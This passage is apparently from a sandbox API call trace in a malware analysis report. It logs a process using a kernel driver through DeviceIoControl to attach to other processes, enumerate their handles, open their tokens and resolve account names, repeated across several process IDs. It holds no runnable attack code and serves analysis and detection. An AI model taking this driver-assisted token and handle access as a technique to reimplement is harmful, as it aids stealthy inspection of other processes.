Object=0xffffd000ac0cf378*=0xffffe0007a0783b0, HandleInformation=0x0) returned 0x0 [0291.664] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.664] PsReleaseProcessExitSynchronization () returned 0x2 [0291.664] ObfDereferenceObject (Object=0xffffe0007a74d840) returned 0x27fef [0291.664] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.664] ObfDereferenceObject (Object=0xffffe0007a0783b0) returned 0x7ffe [0291.664] IoCompleteRequest () returned 0x0 [0291.664] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.664] PsAcquireProcessExitSynchronization () returned 0x0 [0291.664] KeStackAttachProcess (in: PROCESS=0xffffe0007a74d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007a74d840, ApcState=0xffffd000ac0cf400) [0291.664] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069de0cc0, HandleInformation=0x0) returned 0x0 [0291.664] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.664] PsReleaseProcessExitSynchronization () returned 0x2 [0291.664] ObfDereferenceObject (Object=0xffffe0007a74d840) returned 0x27fee [0291.664] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.664] ObfDereferenceObject (Object=0xffffe00069de0cc0) returned 0x7ffe [0291.664] IoCompleteRequest () returned 0x0 [0291.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x504) returned 0x188 [0291.664] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.664] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069fe1080, HandleInformation=0x0) returned 0x0 [0291.664] ObOpenObjectByPointer (in: Object=0xffffe00069fe1080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.664] ObfDereferenceObject (Object=0xffffe00069fe1080) returned 0x2fff2 [0291.664] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.664] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.664] IoCompleteRequest () returned 0x0 [0291.664] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.664] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.672] CloseHandle (hObject=0x18c) returned 1 [0291.672] CloseHandle (hObject=0x188) returned 1 [0291.672] PsLookupProcessByProcessId (in: ProcessId=0x504, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.672] PsAcquireProcessExitSynchronization () returned 0x0 [0291.672] KeStackAttachProcess (in: PROCESS=0xffffe00069fe1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069fe1080, ApcState=0xffffd000ac0cf400) [0291.672] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00077debe10, HandleInformation=0x0) returned 0x0 [0291.672] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.672] PsReleaseProcessExitSynchronization () returned 0x2 [0291.672] ObfDereferenceObject (Object=0xffffe00069fe1080) returned 0x27ff0 [0291.672] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.672] ObfDereferenceObject (Object=0xffffe00077debe10) returned 0x7ffe [0291.672] IoCompleteRequest () returned 0x0 [0291.672] PsLookupProcessByProcessId (in: ProcessId=0x504, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.672] PsAcquireProcessExitSynchronization () returned 0x0 [0291.672] KeStackAttachProcess (in: PROCESS=0xffffe00069fe1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069fe1080, ApcState=0xffffd000ac0cf400) [0291.672] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00077d324c0, HandleInformation=0x0) returned 0x0 [0291.672] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.672] PsReleaseProcessExitSynchronization () returned 0x2 [0291.672] ObfDereferenceObject (Object=0xffffe00069fe1080) returned 0x27fef [0291.672] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.672] ObfDereferenceObject (Object=0xffffe00077d324c0) returned 0x7ffe [0291.672] IoCompleteRequest () returned 0x0 [0291.672] PsLookupProcessByProcessId (in: ProcessId=0x504, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.672] PsAcquireProcessExitSynchronization () returned 0x0 [0291.672] KeStackAttachProcess (in: PROCESS=0xffffe00069fe1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069fe1080, ApcState=0xffffd000ac0cf400) [0291.672] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3961d0, HandleInformation=0x0) returned 0x0 [0291.672] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.672] PsReleaseProcessExitSynchronization () returned 0x2 [0291.672] ObfDereferenceObject (Object=0xffffe00069fe1080) returned 0x27fee [0291.672] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.672] ObfDereferenceObject (Object=0xffffe0006a3961d0) returned 0x7ffe [0291.672] IoCompleteRequest () returned 0x0 [0291.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8cc) returned 0x188 [0291.673] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.673] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069902340, HandleInformation=0x0) returned 0x0 [0291.673] ObOpenObjectByPointer (in: Object=0xffffe00069902340, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.673] ObfDereferenceObject (Object=0xffffe00069902340) returned 0x2fff2 [0291.673] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.673] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.673] IoCompleteRequest () returned 0x0 [0291.673] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.673] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.674] CloseHandle (hObject=0x18c) returned 1 [0291.674] CloseHandle (hObject=0x188) returned 1 [0291.674] PsLookupProcessByProcessId (in: ProcessId=0x8cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.674] PsAcquireProcessExitSynchronization () returned 0x0 [0291.674] KeStackAttachProcess (in: PROCESS=0xffffe00069902340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069902340, ApcState=0xffffd000ac0cf400) [0291.674] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dba090, HandleInformation=0x0) returned 0x0 [0291.674] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.674] PsReleaseProcessExitSynchronization () returned 0x2 [0291.674] ObfDereferenceObject (Object=0xffffe00069902340) returned 0x27ff0 [0291.674] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.674] ObfDereferenceObject (Object=0xffffe00069dba090) returned 0x7ffe [0291.674] IoCompleteRequest () returned 0x0 [0291.674] PsLookupProcessByProcessId (in: ProcessId=0x8cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.674] PsAcquireProcessExitSynchronization () returned 0x0 [0291.674] KeStackAttachProcess (in: PROCESS=0xffffe00069902340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069902340, ApcState=0xffffd000ac0cf400) [0291.674] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e81090, HandleInformation=0x0) returned 0x0 [0291.674] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.674] PsReleaseProcessExitSynchronization () returned 0x2 [0291.674] ObfDereferenceObject (Object=0xffffe00069902340) returned 0x27fef [0291.674] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.674] ObfDereferenceObject (Object=0xffffe00067e81090) returned 0x7ffe [0291.674] IoCompleteRequest () returned 0x0 [0291.674] PsLookupProcessByProcessId (in: ProcessId=0x8cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.674] PsAcquireProcessExitSynchronization () returned 0x0 [0291.674] KeStackAttachProcess (in: PROCESS=0xffffe00069902340, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069902340, ApcState=0xffffd000ac0cf400) [0291.674] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690b3f20, HandleInformation=0x0) returned 0x0 [0291.674] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.675] PsReleaseProcessExitSynchronization () returned 0x2 [0291.675] ObfDereferenceObject (Object=0xffffe00069902340) returned 0x27fee [0291.675] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.675] ObfDereferenceObject (Object=0xffffe000690b3f20) returned 0x7ffe [0291.675] IoCompleteRequest () returned 0x0 [0291.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x52c) returned 0x188 [0291.675] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.675] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069fcb080, HandleInformation=0x0) returned 0x0 [0291.675] ObOpenObjectByPointer (in: Object=0xffffe00069fcb080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.675] ObfDereferenceObject (Object=0xffffe00069fcb080) returned 0x2fff2 [0291.675] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.675] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.675] IoCompleteRequest () returned 0x0 [0291.675] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.675] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.676] CloseHandle (hObject=0x18c) returned 1 [0291.676] CloseHandle (hObject=0x188) returned 1 [0291.676] PsLookupProcessByProcessId (in: ProcessId=0x52c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.676] PsAcquireProcessExitSynchronization () returned 0x0 [0291.676] KeStackAttachProcess (in: PROCESS=0xffffe00069fcb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069fcb080, ApcState=0xffffd000ac0cf400) [0291.676] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069047770, HandleInformation=0x0) returned 0x0 [0291.676] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.676] PsReleaseProcessExitSynchronization () returned 0x2 [0291.676] ObfDereferenceObject (Object=0xffffe00069fcb080) returned 0x27ff0 [0291.676] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.676] ObfDereferenceObject (Object=0xffffe00069047770) returned 0x7ffe [0291.676] IoCompleteRequest () returned 0x0 [0291.676] PsLookupProcessByProcessId (in: ProcessId=0x52c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.676] PsAcquireProcessExitSynchronization () returned 0x0 [0291.676] KeStackAttachProcess (in: PROCESS=0xffffe00069fcb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069fcb080, ApcState=0xffffd000ac0cf400) [0291.676] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690b39a0, HandleInformation=0x0) returned 0x0 [0291.676] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.676] PsReleaseProcessExitSynchronization () returned 0x2 [0291.676] ObfDereferenceObject (Object=0xffffe00069fcb080) returned 0x27fef [0291.676] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.676] ObfDereferenceObject (Object=0xffffe000690b39a0) returned 0x7ffe [0291.676] IoCompleteRequest () returned 0x0 [0291.676] PsLookupProcessByProcessId (in: ProcessId=0x52c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.676] PsAcquireProcessExitSynchronization () returned 0x0 [0291.676] KeStackAttachProcess (in: PROCESS=0xffffe00069fcb080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069fcb080, ApcState=0xffffd000ac0cf400) [0291.676] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691d1ea0, HandleInformation=0x0) returned 0x0 [0291.676] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.676] PsReleaseProcessExitSynchronization () returned 0x2 [0291.676] ObfDereferenceObject (Object=0xffffe00069fcb080) returned 0x27fee [0291.676] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.676] ObfDereferenceObject (Object=0xffffe000691d1ea0) returned 0x7ffe [0291.676] IoCompleteRequest () returned 0x0 [0291.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x188 [0291.677] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.677] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000691dd840, HandleInformation=0x0) returned 0x0 [0291.677] ObOpenObjectByPointer (in: Object=0xffffe000691dd840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.677] ObfDereferenceObject (Object=0xffffe000691dd840) returned 0x2ffe3 [0291.677] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a29a180 | out: TokenHandle=0xffffe0006a29a180*=0x18c) returned 0x0 [0291.677] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.677] IoCompleteRequest () returned 0x0 [0291.677] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.677] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.678] CloseHandle (hObject=0x18c) returned 1 [0291.678] CloseHandle (hObject=0x188) returned 1 [0291.678] PsLookupProcessByProcessId (in: ProcessId=0x41c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.678] PsAcquireProcessExitSynchronization () returned 0x0 [0291.678] KeStackAttachProcess (in: PROCESS=0xffffe000691dd840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691dd840, ApcState=0xffffd000ac0cf400) [0291.678] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f17f20, HandleInformation=0x0) returned 0x0 [0291.678] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.678] PsReleaseProcessExitSynchronization () returned 0x2 [0291.678] ObfDereferenceObject (Object=0xffffe000691dd840) returned 0x27fe1 [0291.678] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.678] ObfDereferenceObject (Object=0xffffe00069f17f20) returned 0x7ffe [0291.678] IoCompleteRequest () returned 0x0 [0291.679] PsLookupProcessByProcessId (in: ProcessId=0x41c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.679] PsAcquireProcessExitSynchronization () returned 0x0 [0291.679] KeStackAttachProcess (in: PROCESS=0xffffe000691dd840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691dd840, ApcState=0xffffd000ac0cf400) [0291.679] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f3f8d0, HandleInformation=0x0) returned 0x0 [0291.679] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.679] PsReleaseProcessExitSynchronization () returned 0x2 [0291.679] ObfDereferenceObject (Object=0xffffe000691dd840) returned 0x27fe0 [0291.679] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.679] ObfDereferenceObject (Object=0xffffe00069f3f8d0) returned 0x7ffe [0291.679] IoCompleteRequest () returned 0x0 [0291.679] PsLookupProcessByProcessId (in: ProcessId=0x41c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.679] PsAcquireProcessExitSynchronization () returned 0x0 [0291.679] KeStackAttachProcess (in: PROCESS=0xffffe000691dd840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691dd840, ApcState=0xffffd000ac0cf400) [0291.679] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fdc6d0, HandleInformation=0x0) returned 0x0 [0291.679] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.679] PsReleaseProcessExitSynchronization () returned 0x2 [0291.679] ObfDereferenceObject (Object=0xffffe000691dd840) returned 0x27fdf [0291.679] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.679] ObfDereferenceObject (Object=0xffffe00069fdc6d0) returned 0x7ffe [0291.679] IoCompleteRequest () returned 0x0 [0291.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x164) returned 0x0 [0291.679] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.679] PsAcquireProcessExitSynchronization () returned 0x0 [0291.679] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.679] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691074e0, HandleInformation=0x0) returned 0x0 [0291.679] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.679] PsReleaseProcessExitSynchronization () returned 0x2 [0291.679] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x30023 [0291.679] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.679] ObfDereferenceObject (Object=0xffffe000691074e0) returned 0x7ffe [0291.679] IoCompleteRequest () returned 0x0 [0291.679] PsLookupProcessByProcessId (in: ProcessId=0x164, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.679] PsAcquireProcessExitSynchronization () returned 0x0 [0291.679] KeStackAttachProcess (in: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069053080, ApcState=0xffffd000ac0cf400) [0291.679] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4da450, HandleInformation=0x0) returned 0x0 [0291.679] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.679] PsReleaseProcessExitSynchronization () returned 0x2 [0291.679] ObfDereferenceObject (Object=0xffffe00069053080) returned 0x30022 [0291.679] ObQueryNameString (in: Object=0xffffe0006a4da450, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.679] ObfDereferenceObject (Object=0xffffe0006a4da450) returned 0x7fde [0291.679] 